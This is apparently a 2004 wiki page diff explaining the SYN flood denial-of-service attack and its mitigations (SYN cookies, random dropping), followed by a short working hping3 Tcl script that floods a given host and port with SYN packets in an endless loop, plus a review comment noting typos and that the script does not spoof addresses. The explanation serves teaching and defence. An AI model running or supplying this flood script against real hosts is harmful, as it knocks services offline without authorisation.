Differences for page SYN floodCurrent version compared with version Sun Sep 12 18:20:10 GMT 2004- todo+ !!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
+
+
+ The goal of this attack is to send TCP connection requests faster than a machine can process them
+ in order to saturate the resources and prevent the machine from accepting any more connections.
+ Actually the attacker does not create a whole TCP connection, but just send a SYN packet
+ (the first packet required to start a TCP connetion), spoofing at random the source IP address,
+ so from the attacker point of view the resource to perform the attack is only the bandwidth
+ because there is no state to take. Modern operating systems are able to handle resources better
+ than in the past, or to use cryptographic techniques (like [Syn cookies] or [RST cookies]) to mitigate
+ the problem (and allocate memory only after the third packet of a new TCP connection reached the host),
+ but still the attack can create some problem. A simpler way to face it, that is somewhat effective and
+ yet very simple, is to drop a connection at random if there are too many open connections.
+
+ ----
+
+
+ This wiki is nothing without code, so here we go (as .htcl file).....
+
+ # (c) GPL2 fluxist(at)gmail.com
+ # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
+
+ if {$argc < 2} {
+ puts "Required arguments: hostname dstport"
+ exit 1
+ }
+
+ foreach {hostname port} $argv break
+ set srcport 14000
+ set target [hping resolve $hostname]
+ set myaddr [hping outifa $target]
+
+ puts "Synflooding $target..."
+
+ while {1} {
+ hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
+ } The following is the old page content
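Review bot: the last sentence of the added paragraph says to drop a connection at random "if there are too many open connections", which reads as dropping established connections. The paragraph is about SYN packets that never complete the handshake, so it should say the random drop applies to pending connection requests that have not yet received their third packet. In the same paragraph, fix "connetion", "just send" (should be "just sends") and "the attacker point of view". In the script, the header comment has "Usage;" where "Usage:" is meant. The packet is built with `saddr=$myaddr` and a fixed `sport=$srcport` (14000), while the paragraph describes source addresses spoofed at random. The sentence introducing the script should state that it sends from the host's own address and a single source port, so readers know its traffic differs from the spoofed case described above and can be filtered on that address and port.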